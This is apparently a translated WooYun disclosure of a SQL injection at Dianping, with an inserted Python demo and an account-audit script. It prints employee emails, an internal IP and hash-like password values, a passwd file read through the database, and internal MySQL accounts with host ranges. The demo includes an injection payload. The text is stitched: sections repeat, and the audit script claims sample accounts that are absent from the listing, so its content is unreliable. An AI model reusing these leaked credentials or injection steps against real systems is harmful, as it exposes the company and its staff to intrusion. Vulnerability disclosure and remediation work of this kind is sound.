11,<blank>,<blank>,0ac370,192.168.224.166,luyan.wang@dianping.com,<blank>,1419410560,luyan.wang,b1310d21a491de8144fbe3d22f5bda7f,0,0
10,<blank>,<blank>,714abb,192.168.224.166,yuchen.yang@dianping.com,<blank>,1419407207,yuchen.yang,db51e0f98d8b68d8e0e2624e398da7ff,0,0
17,<blank>,<blank>,984b83,192.168.224.166,na.xiao@dianping.com,<blank>,1420443321,na.xiao,8a9ccbd02bab31f868768548c2f21d3f,0,0
13,<blank>,<blank>,441340,192.168.224.166,jianjun.tang@dianping.com,<blank>,1419500532,jianjun.tang,e36a6dfe9c0f6ba5e9635b5ce79869c9,0,0
14,<blank>,<blank>,d60614,192.168.224.166,yuhang.qian@dianping.com,<blank>,1419502253,yuhang.qian,025d86fb82e682a3a04a71e235e51385,0,0
15,<blank>,<blank>,643c5c,192.168.224.166,shanshan.xi@dianping.com,<blank>,1419503062,shanshan.xi,d6aff9814f0c3c27e5bf398a85d40777,0,0
18,<blank>,<blank>,dee8ae,192.168.224.166,juan.huang@dianping.com,<blank>,1420702557,juan.huang,9b8d9eb897ff17fb73bc46c3fd7229d9,0,0


Successfully got into the admin backend

[screenshot: 3333.JPG]


Database privileges are very high; files can be read directly

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
nagios:x:498:500:nagios:/var/log/nagios:/bin/sh
mysql:x:497:501::/home/mysql:/bin/bash
zabbix:x:496:497:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin


I won't list them all; matching the data up to the systems is a hassle
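The report shows only the injectable URL (getUserInfo with a mobileno parameter) and states that the injection is MySQL error-based; the backend code is not on the page. As an added example, not code from the report or from Dianping, here is a hypothetical reconstruction of such a lookup in Python, with the concatenated query beside its parameterised form. The table, column names, sample rows and payload are constructed for the demo, and an in-memory SQLite database stands in for MySQL so it runs offline; MySQL's error-based extraction functions are therefore not reproduced, only the two conditions the fix has to remove: user input reaching the SQL parser, and raw database errors reaching the client.

```python
"""Added example, not from the report: a hypothetical getUserInfo lookup,
first with string concatenation (injectable through mobileno), then with a
bound parameter. Table, columns, rows and payload are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users in an in-memory SQLite table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (usernickname TEXT, mobileno TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("iamp912", "13800000001", "iamp912@example.invalid"),
         ("bob", "13800000002", "bob@example.invalid")],
    )
    return conn


def get_user_info_vulnerable(conn, usernickname, mobileno):
    """Builds the WHERE clause by concatenation: both inputs are parsed as SQL."""
    sql = ("SELECT usernickname, mobileno, email FROM users "
           f"WHERE usernickname = '{usernickname}' AND mobileno = '{mobileno}'")
    return conn.execute(sql).fetchall()


def get_user_info_safe(conn, usernickname, mobileno):
    """Same query with placeholders: the driver binds the values as data."""
    sql = ("SELECT usernickname, mobileno, email FROM users "
           "WHERE usernickname = ? AND mobileno = ?")
    return conn.execute(sql, (usernickname, mobileno)).fetchall()


# Tautology payload for mobileno: closes the string literal, ORs in a true condition.
PAYLOAD = "x' OR '1'='1"


def probe_error(conn, payload="'"):
    """A lone quote breaks the statement. If the application echoes the DB error
    to the client, that error channel is what error-based extraction rides on."""
    try:
        get_user_info_vulnerable(conn, "iamp912", payload)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def demo():
    """Row counts returned for the same payload through each implementation."""
    conn = make_db()
    leaked = get_user_info_vulnerable(conn, "iamp912", PAYLOAD)  # every row
    safe = get_user_info_safe(conn, "iamp912", PAYLOAD)          # no match
    return len(leaked), len(safe)


if __name__ == "__main__":
    print(demo(), probe_error(make_db()))
```

With a bound parameter the tautology payload is compared as a literal string and matches nothing, and a lone quote never reaches the parser, so there is no error text to extract from. Suppressing error output alone would not have closed this hole: the same concatenation stays exploitable blind, just more slowly.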

[*] 'dpmobile_r'@'10.1.%'
[*] 'dpmobile_r'@'10.128.%'
[*] 'dpmobile_r'@'192.168.%'
[*] 'dpreview'@'10.1.%'
[*] 'dpreview'@'10.101.%'
[*] 'dpreview'@'10.128.%'
[*] 'dpreview'@'10.2.%'
[*] 'dpreview'@'192.168.%'
[*] 'dpreview_r'@'10.1.%'
[*] 'dpreview_r'@'10.101.%'
[*] 'dpreview_r'@'10.128.%'
[*] 'dpreview_r'@'10.2.%'
[*] 'dpreview_r'@'192.168.%'
[*] 'dpsf'@'10.1.%'
[*] 'dpsf'@'10.101.%'
[*] 'dpsf'@'10.128.%'
[*] 'dpsf'@'10.2.%'
[*] 'dpsf'@'192.168.%'
[*] 'dpsf_r'@'10.1.%'
[*] 'dpsf_r'@'10.101.%'
[*] 'dpsf_r'@'10.128.%'
[*] 'dpsf_r'@'10.2.%'
[*] 'dpsf_r'@'192.168.%'
[*] 'dpshop'@'10.1.%'
[*] 'dpshop'@'10.101.%'
[*] 'dpshop'@'10.128.%'
[*] 'dpshop'@'10.2.%'
[*] 'dpshop'@'192.168.%'
[*] 'dpshop_a'@'10.1.%'
[*] 'dpshop_a'@'10.101.%'
[*] 'dpshop_a'@'10.128.%'
[*] 'dpshop_a'@'10.2.%'
[*] 'dpshop_a'@'192.168.%'
[*] 'dpshop_a_r'@'10.1.%'
[*] 'dpshop_a_r'@'10.101.%'
[*] 'dpshop_a_r'@'10.128.%'
[*] 'dpshop_a_r'@'10.2.%'
[*] 'dpshop_a_r'@'192.168.%'
[*] 'dpshop_r'@'10.1.%'
[*] 'dpshop_r'@'10.101.%'
[*] 'dpshop_r'@'10.128.%'
[*] 'dpshop_r'@'10.2.%'
[*] 'dpshop_r'@'192.168.%'
[*] 'faping.miao'@'10.1.1.62'
[*] 'form'@'10.1.%'
[*] 'form'@'10.128.%'
[*] 'form'@'10.254.251.%'
[*] 'form'@'192.168.%'
[*] 'form_r'@'10.1.%'
[*] 'form_r'@'10.128.%'
[*] 'form_r'@'192.168.%'
[*] 'forum'@'10.1.%'
[*] 'forum'@'10.101.%'
[*] 'forum'@'10.128.%'
[*] 'forum'@'10.2.%'
[*] 'forum'@'192.168.%'
[*] 'forum_r'@'10.1.%'
[*] 'forum_r'@'10.101.%'
[*] 'forum_r'@'10.128.%'
[*] 'forum_r'@'10.2.%'
[*] 'forum_r'@'192.168.%'
[*] 'freshdp'@'10.128.%.%'
[*] 'freshdp'@'192.168.%'
[*] 'FSAccounting'@'10.1.%'
[*] 'FSAccounting'@'10.101.%'
[*] 'FSAccounting'@'10.128.%'
[*] 'FSAccounting'@'10.2.%'
[*] 'FSAccounting'@'192.168.%'
[*] 'FSAccounting_r'@'10.1.%'
[*] 'FSAccounting_r'@'10.101.%'
[*] 'FSAccounting_r'@'10.128.%'
[*] 'FSAccounting_r'@'10.2.%'
[*] 'FSAccounting_r'@'192.168.%'
[*] 'fsexpense'@'10.1.%'
[*] 'fsexpense'@'10.101.%'
[*] 'fsexpense'@'10.128.%'
[*] 'fsexpense'@'10.2.%'
[*] 'fsexpense'@'192.168.%'
[*] 'fsexpense_r'@'10.1.%'
[*] 'fsexpense_r'@'10.101.%'
[*] 'fsexpense_r'@'10.128.%'
[*] 'fsexpense_r'@'10.2.%'
[*] 'fsexpense_r'@'192.168.%'
[*] 'FSReport'@'10.1.%'
[*] 'FSReport'@'10.101.%'
[*] 'FSReport'@'10.128.%'
[*] 'FSReport'@'10.2.%'
[*] 'FSReport'@'192.168.%'
[*] 'FSReport_r'@'10.1.%'
[*] 'FSReport_r'@'10.101.%'
[*] 'FSReport_r'@'10.128.%'
[*] 'FSReport_r'@'10.2.%'
[*] 'FSReport_r'@'192.168.%'
[*] 'fsworkflow'@'10.1.%'
[*] 'fsworkflow'@'10.101.%'
[*] 'fsworkflow'@'10.128.%'
[*] 'fsworkflow'@'10.2.%'
[*] 'fsworkflow'@'192.168.%'
[*] 'fsworkflow_r'@'10.1.%'
[*] 'fsworkflow_r'@'10.101.%'
[*] 'fsworkflow_r'@'10.128.%'
[*] 'fsworkflow_r'@'10.2.%'
[*] 'fsworkflow_r'@'192.168.%'
[*] 'gpadmin'@'10.1.1.239'
[*] 'haproxy'@'192.168.%'
[*] 'hong.wang'@'10.128.%.%'
[*] 'hong.wang'@'192.168.%'
[*] 'hrservice'@'10.1.%'
[*] 'hrservice'@'10.101.%'
[*] 'hrservice'@'10.128.%'
[*] 'hrservice'@'10.2.%'
[*] 'hrservice'@'192.168.%'
[*] 'hrservice_r'@'10.1.%'
[*] 'hrservice_r'@'10.101.%'
[*] 'hrservice_r'@'10.128.%'
[*] 'hrservice_r'@'10.2.%'
[*] 'hrservice_r'@'192.168.%'
[*] 'imageflow'@'10.1.%'
[*] 'imageflow'@'10.101.%'
[*] 'imageflow'@'10.128.%'
[*] 'imageflow'@'10.2.%'
[*] 'imageflow'@'192.168.%'
[*] 'imageflow_r'@'10.1.%'
[*] 'imageflow_r'@'10.101.%'
[*] 'imageflow_r'@'10.128.%'
[*] 'imageflow_r'@'10.2.%'
[*] 'imageflow_r'@'192.168.%'
[*] 'jin.huang'@'10.128.%.%'
[*] 'jin.huang'@'192.168.%'
[*] 'junyi.lu'@'10.1.1.%'
[*] 'mail_mirror'@'10.1.%'
[*] 'mmm_agent'@'10.1.77.%'
[*] 'mmm_monitor'@'10.1.77.%'
[*] 'motion'@'10.1.%'
[*] 'motion'@'10.101.%'
[*] 'motion'@'10.128.%'
[*] 'motion'@'10.2.%'
[*] 'motion'@'192.168.%'
[*] 'motion_r'@'10.1.%'
[*] 'motion_r'@'10.101.%'
[*] 'motion_r'@'10.128.%'
[*] 'motion_r'@'10.2.%'
[*] 'motion_r'@'192.168.%'
[*] 'myadmin'@'10.1.%'
[*] 'myadmin'@'10.1.1.186'
[*] 'myadmin'@'10.1.1.231'
[*] 'myadmin'@'10.1.1.62'
[*] 'myadmin'@'192.168.%'
[*] 'myadmin'@'localhost'
[*] 'overseas'@'10.1.%'
[*] 'overseas'@'10.101.%'
[*] 'overseas'@'10.128.%'
[*] 'overseas'@'10.2.%'
[*] 'overseas'@'192.168.%'
[*] 'overseas_r'@'10.1.%'
[*] 'overseas_r'@'10.101.%'
[*] 'overseas_r'@'10.128.%'
[*] 'overseas_r'@'10.2.%'
[*] 'overseas_r'@'192.168.%'
[*] 'qunying.liu'@'10.1.%'
[*] 'repl'@'10.1.77.%'
[*] 'root'@'localhost'
[*] 'ryan.yu'@'10.128.%.%'
[*] 'ryan.yu'@'10.254.25%'
[*] 'ryan.yu'@'192.168.%'
[*] 'SearchKV'@'10.128.%.%'
[*] 'SearchKV'@'192.168.%'
[*] 'searchportal'@'10.1.%'
[*] 'searchportal'@'10.128.%'
[*] 'searchportal'@'192.168.%'
[*] 'searchportal_r'@'10.1.%'
[*] 'searchportal_r'@'10.128.%'
[*] 'searchportal_r'@'192.168.%'
[*] 'slb'@'10.1.%'
[*] 'slb'@'10.101.%'
[*] 'slb'@'10.128.%'
[*] 'slb'@'10.2.%'
[*] 'slb'@'192.168.%'
[*] 'slb_r'@'10.1.%'
[*] 'slb_r'@'10.101.%'
[*] 'slb_r'@'10.128.%'
[*] 'slb_r'@'10.2.%'
[*] 'slb_r'@'192.168.%'
[*] 'tempuser_L1U0'@'10.254.25%'
[*] 'tempuser_L1U0'@'192.168.%'
[*] 'tempuser_L2U0'@'10.254.25%'
[*] 'tempuser_L2U0'@'192.168.%'
[*] 'tempuser_L3U0'@'10.254.25%'
[*] 'tempuser_L3U0'@'192.168.%'
[*] 'tempuser_L3U1'@'10.254.25%'
[*] 'tempuser_L3U1'@'192.168.%'
[*] 'toplist'@'10.1.%'
[*] 'toplist'@'10.101.%'
[*] 'toplist'@'10.128.%'
[*] 'toplist'@'10.2.%'
[*] 'toplist'@'192.168.%'
[*] 'toplist_r'@'10.1.%'
[*] 'toplist_r'@'10.101.%'
[*] 'toplist_r'@'10.128.%'
[*] 'toplist_r'@'10.2.%'
[*] 'toplist_r'@'192.168.%'
[*] 'wechat'@'10.1.%'
[*] 'wechat'@'10.101.%'
[*] 'wechat'@'10.128.%'
[*] 'wechat'@'10.2.%'
[*] 'wechat'@'192.168.%'
[*] 'wechat_r'@'10.1.%'
[*] 'wechat_r'@'10.101.%'
[*] 'wechat_r'@'10.128.%'
[*] 'wechat_r'@'10.2.%'
[*] 'wechat_r'@'192.168.%'
[*] 'welife'@'10.1.%'
[*] 'welife'@'10.101.%'
[*] 'welife'@'10.128.%'
[*] 'welife'@'10.2.%'
[*] 'welife'@'192.168.%'
[*] 'welife_r'@'10.1.%'
[*] 'welife_r'@'10.101.%'
[*] 'welife_r'@'10.128.%'
[*] 'welife_r'@'10.2.%'
[*] 'welife_r'@'192.168.%'
[*] 'wesms'@'10.1.%'
[*] 'wesms'@'10.101.%'
[*] 'wesms'@'10.128.%'
[*] 'wesms'@'10.2.%'
[*] 'wesms'@'192.168.%'
[*] 'wesms_r'@'10.1.%'
[*] 'wesms_r'@'10.101.%'
[*] 'wesms_r'@'10.128.%'
[*] 'wesms_r'@'10.2.%'
[*] 'wesms_r'@'192.168.%'
[*] 'zhiyuan.li'@'10.1.%'
[*] 'zhiyuan.li'@'10.128.%.%'
[*] 'zhiyuan.li'@'192.168.%'
</code>
This data could lead to the leak of the entire business line's data.
There are too many databases to tell apart, so I just picked one to try.
Seeing the forum database, I tried to find the DZ (Discuz) forum; after a long search I finally found it:
bbs.51ping.com/bbs

masked region
*****egdate,username,passwo*****
*****m,<blank>,1419326409,admi*****
*****ing.com,<blank>,1419498405,zhi*****
*****ping.com,<blank>,1419410560,l*****
*****ing.com,<blank>,1419407207,yuc*****
*****ing.com,<blank>,1420443321,n*****
*****ping.com,<blank>,1419500532,ji*****
*****ing.com,<blank>,1419502253,yuh*****
*****ing.com,<blank>,1419503062,sha*****
*****ping.com,<blank>,1420702557,j*****


Successfully entered the admin backend

3333.JPG


The database account has very high privileges; files can be read directly:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
nslcd:x:65:55:LDAP Client User:/:/sbin/nologin
nagios:x:498:500:nagios:/var/log/nagios:/bin/sh
mysql:x:497:501::/home/mysql:/bin/bash
zabbix:x:496:497:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin
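As a defender's follow-up to the account listing and the file read above, here is an added audit helper; it is not code from the original report or from the vendor. It parses sqlmap-style `[*] 'user'@'host'` lines of the kind listed in this report and `SHOW GRANTS` output, and flags accounts whose host pattern is wider than a /24, administrative accounts reachable from a wildcard range, and grants that hand out OS-reaching global privileges such as FILE or ALL PRIVILEGES on `*.*`. The sample account lines are copied from this report's listing; the GRANT lines are constructed samples, and the set of administrative account names and the /24 threshold are assumptions for illustration.

```python
"""Audit MySQL account host scopes and dangerous global privileges.

Added example for this report, not part of the original page. Input formats:
  - sqlmap-style account lines:  [*] 'user'@'host'
  - SHOW GRANTS lines:           GRANT <privs> ON <obj> TO 'user'@'host' [WITH GRANT OPTION]
"""
import re

# sqlmap "database management system users" line, as printed in the report above
ACCOUNT_RE = re.compile(r"^\[\*\]\s+'(?P<user>[^']*)'@'(?P<host>[^']*)'\s*$")
# SHOW GRANTS output line (samples below are constructed, not from the report)
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<obj>\S+)\s+TO\s+'(?P<user>[^']*)'@'(?P<host>[^']*)'",
    re.IGNORECASE,
)
# Global privileges that let a database account reach the host OS or other accounts
DANGEROUS_PRIVS = {"ALL PRIVILEGES", "FILE", "SUPER", "PROCESS", "GRANT OPTION", "SHUTDOWN"}
# Assumption: account names treated as administrative (taken from the listing above)
ADMIN_NAMES = {"root", "myadmin", "cmadmin", "gpadmin", "admin"}

# Sample account lines copied from this report's listing
SAMPLE_ACCOUNTS = """
[*] 'root'@'localhost'
[*] 'myadmin'@'192.168.%'
[*] 'dpcomm'@'10.1.%'
[*] 'dong.wang'@'10.1.1.62'
[*] 'dpbase_auth'@'10.1.2.119'
"""

# Constructed SHOW GRANTS samples (hypothetical; the report does not show grants)
SAMPLE_GRANTS = """
GRANT USAGE ON *.* TO 'dpcomm'@'10.1.%'
GRANT ALL PRIVILEGES ON *.* TO 'myadmin'@'192.168.%' WITH GRANT OPTION
GRANT SELECT, INSERT, UPDATE ON `DPShop`.* TO 'dpshop'@'10.1.%'
GRANT SELECT, FILE ON *.* TO 'dbi_user'@'192.168.%'
"""


def parse_accounts(text):
    """Return (user, host) tuples from sqlmap-style account listing lines."""
    accounts = []
    for line in text.splitlines():
        m = ACCOUNT_RE.match(line.strip())
        if m:
            accounts.append((m.group("user"), m.group("host")))
    return accounts


def fixed_octets(host):
    """Count leading, fully numeric dotted octets before the first wildcard."""
    n = 0
    for part in host.split("."):
        if part.isdigit() and int(part) <= 255:
            n += 1
        else:
            break
    return n


def host_breadth(host):
    """Approximate number of IPv4 addresses a MySQL host pattern can match.
    Exact hosts and 'localhost' count as 1; each unfixed octet contributes 256
    (so '10.254.25%' is deliberately over-estimated as a full /16)."""
    if "%" not in host and "_" not in host:
        return 1
    return 256 ** (4 - fixed_octets(host))


def audit_accounts(accounts, max_fixed_octets=2):
    """Flag (user, host, reason) for host scopes wider than a /24 and for
    administrative accounts reachable from any wildcard range."""
    findings = []
    for user, host in accounts:
        wildcard = host_breadth(host) > 1
        if wildcard and fixed_octets(host) <= max_fixed_octets:
            findings.append((user, host, "host pattern wider than a /24"))
        if wildcard and user.lower() in ADMIN_NAMES:
            findings.append((user, host, "administrative account reachable from a wildcard range"))
    return findings


def audit_grants(text):
    """Flag (user, host, [privs]) for GRANT lines giving dangerous global privileges on *.*."""
    findings = []
    for line in text.splitlines():
        m = GRANT_RE.match(line.strip())
        if not m or m.group("obj") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "WITH GRANT OPTION" in line.upper():
            privs.add("GRANT OPTION")
        bad = sorted(privs & DANGEROUS_PRIVS)
        if bad:
            findings.append((m.group("user"), m.group("host"), bad))
    return findings


if __name__ == "__main__":
    for user, host, reason in audit_accounts(parse_accounts(SAMPLE_ACCOUNTS)):
        print(f"ACCOUNT  '{user}'@'{host}': {reason}")
    for user, host, privs in audit_grants(SAMPLE_GRANTS):
        print(f"GRANT    '{user}'@'{host}': {', '.join(privs)} on *.*")
```

Run against the full listing above, the host-scope check alone flags most of the `10.1.%`, `10.128.%.%` and `192.168.%` entries, which is the point: a web-facing test system with such a broad account surface and a FILE-capable account turns one injection into a host compromise, so the grant audit and a narrower host scope are the first things to tighten.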

Remediation:

Copyright notice: when reposting, please credit the source if、so@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmation time: 2015-01-09 15:22

Vendor reply:

Thanks, it was caused by a serious misconfiguration.

Latest status:

None yet